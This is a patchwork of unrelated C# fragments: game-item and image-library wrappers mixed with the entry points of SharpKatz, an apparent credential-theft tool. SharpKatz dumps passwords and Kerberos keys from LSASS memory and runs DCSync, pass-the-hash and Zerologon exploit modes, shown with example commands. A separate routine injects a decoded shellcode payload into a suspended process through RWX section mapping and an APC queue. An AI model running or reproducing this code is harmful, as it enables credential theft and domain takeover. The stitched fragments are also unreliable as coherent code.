public RemoteMemoryProtection(RemoteProcess process, IntPtr pointer, int size, Natives.Enumerations.MemoryProtectionFlags newProtection)
: base(process, pointer)
{
NewProtection = newProtection;
Size = size;
Natives.Enumerations.MemoryProtectionFlags oldProtection;
Natives.Syscall.ProtectVirtualMemory(Process.ProcessHandle, Pointer, Size, NewProtection, out oldProtection);
OldProtection = oldProtection;
}
/// <summary>
/// Retrieves Address of native
/// </summary>
/// <param name="native">Using Native Enum, You can retrieve the native hash</param>
/// <returns>Hash</returns>
public static uint GetNative(Natives native)
{
if (isFinished == true)
{
return natives[Enum.GetName(typeof(Natives),native)];
}
else
{
return 0x0;
}
}
public int GetUserData()
{
return((int)Natives.GetItemUserData(this));
}
public int GetCharges()
{
return((int)Natives.GetItemCharges(this));
}
public void SetVisible(bool flag)
{
Natives.SetItemVisible(this, flag);
}
public void SetPawnable(bool flag)
{
Natives.SetItemPawnable(this, flag);
}
public void SetInvulnerable(bool flag)
{
Natives.SetItemInvulnerable(this, flag);
}
public static void Main(string[] args)
{
string command = null;
string user = null;
string guid = null;
string altservice = null;
string domain = null;
string dc = null;
string ntlmHash = null;
string aes128 = null;
string aes256 = null;
string rc4 = null;
string binary = null;
string arguments = null;
string luid = null;
string impersonateStr = null;
string authuser = null;
string authdomain = null;
string authpassword = null;
string forcentlmStr = null;
string mode = null;
string auth = null;
string target = null;
string machineaccount = null;
string nullsessionStr = null;
bool showhelp = false;
OptionSet opts = new OptionSet()
{
{ "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v },
{ "User="******"--User [user]", v => user = v },
{ "Guid=", "--Guid [guid]", v => guid = v },
{ "Domain=", "--Domain [domain]", v => domain = v },
{ "DomainController=", "--DomainController [domaincontroller]", v => dc = v },
{ "NtlmHash=", "--NtlmHash [ntlmHash]", v => ntlmHash = v },
{ "Aes128=", "--Aes128 [aes128]", v => aes128 = v },
{ "Aes256=", "--Aes256 [aes256]", v => aes256 = v },
{ "Rc4=", "--Rc4 [rc4]", v => rc4 = v },
{ "Binary=", "--Binary [binary]", v => binary = v },
{ "Arguments=", "--Arguments [arguments]", v => arguments = v },
{ "Luid=", "--Luid [luid]", v => luid = v },
{ "Impersonate=", "--Impersonate [impersonate]", v => impersonateStr = v },
{ "Mode=", "--Mode [mode]", v => mode = v },
{ "Auth=", "--Auth [auth]", v => auth = v },
{ "Target=", "--Target [target]", v => target = v },
{ "MachineAccount=", "--MachineAccount [machineaccount]", v => machineaccount = v },
{ "NullSession=", "--NullSession [nullsession]", v => nullsessionStr = v },
{ "AuthUser="******"--AuthUser [authuser]", v => authuser = v },
{ "AuthDomain=", "--AuthDomain [authdomain]", v => authdomain = v },
{ "AuthPassword="******"--AuthPassword [authpassword]", v => authpassword = v },
{ "ForceNtlm=", "--ForceNtlm [forcentlm]", v => forcentlmStr = v },
{ "Altservice=", "--Altservice [alternative service]", v => altservice = v },
{ "h|?|help", "Show available options", v => showhelp = v != null },
};
try
{
opts.Parse(args);
}
catch (OptionException e)
{
Console.WriteLine(e.Message);
}
bool impersonate = false;
try
{
if (!string.IsNullOrEmpty(impersonateStr))
{
impersonate = bool.Parse(impersonateStr);
}
}
catch (OptionException e)
{
Console.WriteLine(e.Message);
}
bool forcentlm = false;
try
{
if (!string.IsNullOrEmpty(forcentlmStr))
{
forcentlm = bool.Parse(forcentlmStr);
}
}
catch (OptionException e)
{
Console.WriteLine(e.Message);
}
bool nullsession = false;
try
{
if (!string.IsNullOrEmpty(nullsessionStr))
{
nullsession = bool.Parse(nullsessionStr);
}
}
catch (OptionException e)
{
Console.WriteLine(e.Message);
}
if (showhelp)
{
opts.WriteOptionDescriptions(Console.Out);
Console.WriteLine();
Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords");
Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys");
Console.WriteLine("[*] Example: SharpKatz.exe --Command msv");
Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos");
Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg");
Console.WriteLine("[*] Example: SharpKatz.exe --Command credman");
Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc");
Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash");
Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key");
Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash");
Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256");
Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$");
Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$");
Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local");
return;
}
if (string.IsNullOrEmpty(command))
{
command = "logonpasswords";
}
if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") &&
!command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync") && !command.Equals("pth") && !command.Equals("zerologon"))
{
Console.WriteLine("Unknown command");
return;
}
if (IntPtr.Size != 8)
{
Console.WriteLine("Windows 32bit not supported");
return;
}
OSVersionHelper osHelper = new OSVersionHelper();
osHelper.PrintOSVersion();
if (osHelper.build <= 9600)
{
Console.WriteLine("Unsupported OS Version");
return;
}
if (!command.Equals("dcsync") && !command.Equals("zerologon"))
{
if (!Utility.IsElevated())
{
Console.WriteLine("Run in High integrity context");
return;
}
Utility.SetDebugPrivilege();
IntPtr lsasrv = IntPtr.Zero;
IntPtr wdigest = IntPtr.Zero;
IntPtr lsassmsv1 = IntPtr.Zero;
IntPtr kerberos = IntPtr.Zero;
IntPtr tspkg = IntPtr.Zero;
IntPtr lsasslive = IntPtr.Zero;
IntPtr hProcess = IntPtr.Zero;
Process plsass = Process.GetProcessesByName("lsass")[0];
ProcessModuleCollection processModules = plsass.Modules;
int modulefound = 0;
for (int i = 0; i < processModules.Count && modulefound < 5; i++)
{
string lower = processModules[i].ModuleName.ToLowerInvariant();
if (lower.Contains("lsasrv.dll"))
{
lsasrv = processModules[i].BaseAddress;
modulefound++;
}
else if (lower.Contains("wdigest.dll"))
{
wdigest = processModules[i].BaseAddress;
modulefound++;
}
else if (lower.Contains("msv1_0.dll"))
{
lsassmsv1 = processModules[i].BaseAddress;
modulefound++;
}
else if (lower.Contains("kerberos.dll"))
{
kerberos = processModules[i].BaseAddress;
modulefound++;
}
else if (lower.Contains("tspkg.dll"))
{
tspkg = processModules[i].BaseAddress;
modulefound++;
}
}
hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);
Keys keys = new Keys(hProcess, lsasrv, osHelper);
if (command.Equals("pth"))
{
if (string.IsNullOrEmpty(binary))
{
binary = "cmd.exe";
}
Module.Pth.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, impersonate);
}
else
{
List <Logon> logonlist = new List <Logon>();
Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
if (command.Equals("logonpasswords") || command.Equals("msv"))
{
Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("credman"))
{
Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("tspkg"))
{
Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys"))
{
List <KerberosLogonItem> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
if (command.Equals("logonpasswords") || command.Equals("kerberos"))
{
foreach (KerberosLogonItem l in klogonlist)
{
Module.Kerberos.GetCredentials(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
}
if (command.Equals("ekeys"))
{
foreach (KerberosLogonItem l in klogonlist)
{
Module.Kerberos.GetKerberosKeys(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
}
}
if (command.Equals("logonpasswords") || command.Equals("wdigest"))
{
Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
Utility.PrintLogonList(logonlist);
}
}
else
{
if (command.Equals("dcsync"))
{
if (string.IsNullOrEmpty(domain))
{
domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN");
}
Console.WriteLine("[!] {0} will be the domain", domain);
if (string.IsNullOrEmpty(dc))
{
using (DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE"))
dc = (string)rootdse.Properties["dnshostname"].Value;
}
Console.WriteLine("[!] {0} will be the DC server", dc);
string alt_service = "ldap";
if (!string.IsNullOrEmpty(altservice))
{
alt_service = altservice;
}
if (!string.IsNullOrEmpty(guid))
{
Console.WriteLine("[!] {0} will be the Guid", guid);
Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm);
}
else if (!string.IsNullOrEmpty(user))
{
Console.WriteLine("[!] {0} will be the user account", user);
Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm);
}
else
{
Module.DCSync.FinCredential(domain, dc, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm, alldata: true);
}
}
else
{
if (string.IsNullOrEmpty(mode) || (!mode.Equals("check") && !mode.Equals("exploit") && !mode.Equals("auto")))
{
Console.WriteLine("[x] Missing or incorrect required parameter -> Mode");
return;
}
else if (mode.Equals("auto") && (string.IsNullOrEmpty(domain) || string.IsNullOrEmpty(dc)))
{
Console.WriteLine("[x] Missing required parameter -> Domain or DomainController");
return;
}
if (string.IsNullOrEmpty(target))
{
Console.WriteLine("[x] Missing or incorrect required parameter -> Target");
return;
}
if (string.IsNullOrEmpty(machineaccount))
{
Console.WriteLine("[x] Missing or incorrect required parameter -> MachineAccount");
return;
}
int authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;
if (!string.IsNullOrEmpty(auth))
{
switch (auth)
{
case "noauth":
authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;
break;
case "ntlm":
authnSvc = Module.DCSync.RPC_C_AUTHN_WINNT;
break;
case "kerberos":
authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_KERBEROS;
break;
case "negotiate":
authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_NEGOTIATE;
break;
default:
Console.WriteLine("[!] Invalid Auth parameter value, use default -> AUTHN_NONE");
authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;
break;
}
}
bool success = Module.Zerologon.RunZerologon(mode, target, machineaccount, authnSvc, nullsession);
if (success == true)
{
Console.WriteLine("[*]");
if (mode.Equals("auto"))
{
Console.WriteLine("[!] {0} will be the domain", domain);
Console.WriteLine("[!] {0} will be the DC server", dc);
if (!string.IsNullOrEmpty(guid))
{
Console.WriteLine("[!] {0} will be the Guid", guid);
Module.DCSync.FinCredential(domain, dc, guid: guid, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true);
}
else if (!string.IsNullOrEmpty(user))
{
Console.WriteLine("[!] {0} will be the user account", user);
Module.DCSync.FinCredential(domain, dc, user: user, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true);
}
else
{
Module.DCSync.FinCredential(domain, dc, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true, alldata: true);
}
}
}
else
{
Console.WriteLine("[x] Attack failed. Target is probably patched.");
}
}
}
}
public static void Define(
[MarshalAs(UnmanagedType.Bool)] Boolean isX64,
[MarshalAs(UnmanagedType.U1)] Byte Syscode
) => Natives.Init(isX64, (GMLoaded.System)Syscode);
public void Initialize()
{
Natives.Add(new GetDateTimePrototype(GetDateTime));
}
public void SetPosition(float x, float y)
{
Natives.SetItemPosition(this, x, y);
}
public float GetY()
{
return(Natives.GetItemY(this));
}
public float GetX()
{
return(Natives.GetItemX(this));
}
public bool IsOwned()
{
return(Natives.IsItemOwned(this));
}
public void SetPlayer(JassPlayer player)
{
Natives.SetItemPlayer(this, player, false);
}
public void SetPlayer(JassPlayer player, bool changeColor)
{
Natives.SetItemPlayer(this, player, changeColor);
}
// runlength.c (791, 1)
// makeMSBitLocTab(bitval) as int[]
// makeMSBitLocTab(l_int32) as l_int32 *
/// <summary>
/// (1) If bitval == 1, it finds the leftmost ON pixel in a byte
/// otherwise if bitval == 0, it finds the leftmost OFF pixel.<para/>
///
/// (2) If there are no pixels of the indicated color in the byte,
/// this returns 8.
/// </summary>
/// <remarks>
/// </remarks>
/// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/makeMSBitLocTab/*"/>
/// <param name="bitval">[in] - either 0 or 1</param>
/// <returns>table giving, for an input byte, the MS bit location, starting at 0 with the MSBit in the byte, or NULL on error.</returns>
public static int[] makeMSBitLocTab(
int bitval)
{
int[] _Result = Natives.makeMSBitLocTab(bitval);
return(_Result);
}
internal void SetClipboard()
{
Natives.OleSetClipboard(this);
}
public bool IsInvulnerable()
{
return(Natives.IsItemInvulnerable(this));
}
public static void Main(string[] args)
{
string command = null;
string user = null;
string guid = null;
string altservice = null;
string domain = null;
string dc = null;
bool showhelp = false;
OptionSet opts = new OptionSet()
{
{ "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v },
{ "User="******"--User [user]", v => user = v },
{ "Guid=", "--Guid [guid]", v => guid = v },
{ "Domain=", "--Domain [domain]", v => domain = v },
{ "DomainController=", "--DomainController [domaincontroller]", v => dc = v },
{ "Altservice=", "--Altservice [alternative service]", v => altservice = v },
{ "h|?|help", "Show available options", v => showhelp = v != null },
};
try
{
opts.Parse(args);
}
catch (OptionException e)
{
Console.WriteLine(e.Message);
}
if (showhelp)
{
opts.WriteOptionDescriptions(Console.Out);
Console.WriteLine();
Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords");
Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys");
Console.WriteLine("[*] Example: SharpKatz.exe --Command msv");
Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos");
Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg");
Console.WriteLine("[*] Example: SharpKatz.exe --Command credman");
Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc");
Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc");
return;
}
if (string.IsNullOrEmpty(command))
{
command = "logonpasswords";
}
if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") &&
!command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync"))
{
Console.WriteLine("Unknown command");
return;
}
if (IntPtr.Size != 8)
{
Console.WriteLine("Windows 32bit not supported");
return;
}
OSVersionHelper osHelper = new OSVersionHelper();
osHelper.PrintOSVersion();
if (osHelper.build <= 9600)
{
Console.WriteLine("Unsupported OS Version");
return;
}
if (!command.Equals("dcsync"))
{
if (!Utility.IsElevated())
{
Console.WriteLine("Run in High integrity context");
return;
}
Utility.SetDebugPrivilege();
IntPtr lsasrv = IntPtr.Zero;
IntPtr wdigest = IntPtr.Zero;
IntPtr lsassmsv1 = IntPtr.Zero;
IntPtr kerberos = IntPtr.Zero;
IntPtr tspkg = IntPtr.Zero;
IntPtr lsasslive = IntPtr.Zero;
IntPtr hProcess = IntPtr.Zero;
Process plsass = Process.GetProcessesByName("lsass")[0];
ProcessModuleCollection processModules = plsass.Modules;
int modulefound = 0;
for (int i = 0; i < processModules.Count && modulefound < 5; i++)
{
if (processModules[i].ModuleName.ToLower().Contains("lsasrv.dll"))
{
lsasrv = processModules[i].BaseAddress;
modulefound++;
}
if (processModules[i].ModuleName.ToLower().Contains("wdigest.dll"))
{
wdigest = processModules[i].BaseAddress;
modulefound++;
}
if (processModules[i].ModuleName.ToLower().Contains("msv1_0.dll"))
{
lsassmsv1 = processModules[i].BaseAddress;
modulefound++;
}
if (processModules[i].ModuleName.ToLower().Contains("kerberos.dll"))
{
kerberos = processModules[i].BaseAddress;
modulefound++;
}
if (processModules[i].ModuleName.ToLower().Contains("tspkg.dll"))
{
tspkg = processModules[i].BaseAddress;
modulefound++;
}
}
hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);
List <Logon> logonlist = new List <Logon>();
Keys keys = new Keys(hProcess, lsasrv, osHelper);
Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
if (command.Equals("logonpasswords") || command.Equals("msv"))
{
Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("credman"))
{
Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("tspkg"))
{
Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys"))
{
List <byte[]> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
if (command.Equals("logonpasswords") || command.Equals("kerberos"))
{
foreach (byte[] p in klogonlist)
{
Module.Kerberos.GetCredentials(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
}
if (command.Equals("ekeys"))
{
foreach (byte[] p in klogonlist)
{
Module.Kerberos.GetKerberosKeys(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
}
}
if (command.Equals("logonpasswords") || command.Equals("wdigest"))
{
Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);
}
Utility.PrintLogonList(logonlist);
}
else
{
if (string.IsNullOrEmpty(domain))
{
domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN");
}
Console.WriteLine("[!] {0} will be the domain", domain);
if (string.IsNullOrEmpty(dc))
{
DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE");
dc = (string)rootdse.Properties["dnshostname"].Value;
}
Console.WriteLine("[!] {0} will be the DC server", dc);
string alt_service = "ldap";
if (!string.IsNullOrEmpty(altservice))
{
alt_service = altservice;
}
if (!string.IsNullOrEmpty(guid))
{
Console.WriteLine("[!] {0} will be the Guid", guid);
Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service);
}
else if (!string.IsNullOrEmpty(user))
{
Console.WriteLine("[!] {0} will be the user account", user);
Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service);
}
else
{
Module.DCSync.FinCredential(domain, dc, altservice: alt_service, alldata: true);
}
}
}
public bool IsPawnable()
{
return(Natives.IsItemPawnable(this));
}
static void Execute(string [] args)
{
var startInfo = new Natives.STARTUPINFO();
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.LARGE_INTEGER largeinteger = new Natives.LARGE_INTEGER();
Natives.SYSTEM_INFO info = new Natives.SYSTEM_INFO();
startInfo.cb = (uint)Marshal.SizeOf(startInfo);
Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
IntPtr section = IntPtr.Zero;
uint size = 0;
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
IntPtr soffset = IntPtr.Zero;
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
IntPtr hToken = IntPtr.Zero;
IntPtr hProcTest = IntPtr.Zero;
IntPtr hTokenTest = IntPtr.Zero;
uint flags = Natives.CreateSuspended | Natives.CreateNoWindow;
try
{
if (Natives.CreateProcessWithLogonW("#USERNAME#", "#DOMAIN#", "#PASSWORD#", Natives.LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\#SPAWN#", "", flags, (UInt32)0, "C:\\Windows\\System32", ref startInfo, out procInfo))
{
byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));
//Round payload size to page size
Natives.GetSystemInfo(ref info);
size = info.dwPageSize - (uint)payload.Length % info.dwPageSize + (uint)payload.Length;
largeinteger.LowPart = size;
//Crteate section in current process
var status = Natives.ZwCreateSection(ref section, Natives.GenericAll, IntPtr.Zero, ref largeinteger, Natives.PAGE_EXECUTE_READWRITE, Natives.SecCommit, IntPtr.Zero);
//Map section to current process
status = Natives.ZwMapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, IntPtr.Zero, IntPtr.Zero, soffset, ref viewSize, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr != IntPtr.Zero)
{
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
status = Natives.ZwMapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref viewSizeEx, 1, 0, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx != IntPtr.Zero && viewSizeEx != IntPtr.Zero)
{
//Unmap current process section
Natives.ZwUnmapViewOfSection(Natives.GetCurrentProcess(), baseAddr);
// Assign address of shellcode to the target thread apc queue
IntPtr th = procInfo.hThread;
IntPtr ptrq = Natives.ZwQueueApcThread(th, baseAddrEx, IntPtr.Zero);
Natives.ZwSetInformationThread(th, 1, IntPtr.Zero, 0);
int rest = Natives.ZwResumeThread(th, out ulong outsupn);
}
else
{
Console.WriteLine("[x] Error mapping remote section");
}
}
else
{
Console.WriteLine("[x] Error mapping section to current process");
}
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
else
{
Console.WriteLine("[x] Error creating process");
}
Natives.CloseHandle(hProcTest);
Natives.CloseHandle(hTokenTest);
}
catch (Exception e)
{
Console.WriteLine("[x] Generic error");
}
}
public bool IsVisible()
{
return(Natives.IsItemVisible(this));
}
// pixalloc.c (511, 1)
// pmsLogInfo() as Object
// pmsLogInfo() as void
/// <summary>
/// pmsLogInfo()
/// </summary>
/// <remarks>
/// </remarks>
/// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/pmsLogInfo/*"/>
public static void pmsLogInfo()
{
Natives.pmsLogInfo();
}
public static JassItem Create(JassObjectId itemid, float x, float y)
{
return(Natives.CreateItem(itemid, x, y));
}
// pixalloc.c (267, 1)
// pmsDestroy() as Object
// pmsDestroy() as void
/// <summary>
/// (1) Important: call this function at the end of the program, after
/// the last pix has been destroyed.
/// </summary>
/// <remarks>
/// </remarks>
/// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/pmsDestroy/*"/>
public static void pmsDestroy()
{
Natives.pmsDestroy();
}
public void SetCharges(int charges)
{
Natives.SetItemCharges(this, charges);
}
// binreduce.c (384, 1)
// makeSubsampleTab2x() as Byte[]
// makeSubsampleTab2x() as l_uint8 *
/// <summary>
/// This table permutes the bits in a byte, from
/// 0 4 1 5 2 6 3 7
/// to
/// 0 1 2 3 4 5 6 7
/// </summary>
/// <remarks>
/// </remarks>
/// <include file="..\CHM_Help\IncludeComments.xml" path="Comments/makeSubsampleTab2x/*"/>
/// <returns>tab table of 256 permutations, or NULL on error</returns>
public static Byte[] makeSubsampleTab2x()
{
Byte[] _Result = Natives.makeSubsampleTab2x();
return(_Result);
}
public void SetUserData(int data)
{
Natives.SetItemUserData(this, data);
}
/// <summary> /// Returns true, if contains natives for specified operating system. /// </summary> public bool IsNativesFor(string operatingSystem) => IsNatives && Natives.ContainsKey(operatingSystem);
public FILE(string Filename)
: this(Natives.lept_fopen(Filename, "rb"))
{
}
public JassPlayer GetPlayer()
{
return(Natives.GetItemPlayer(this));
}
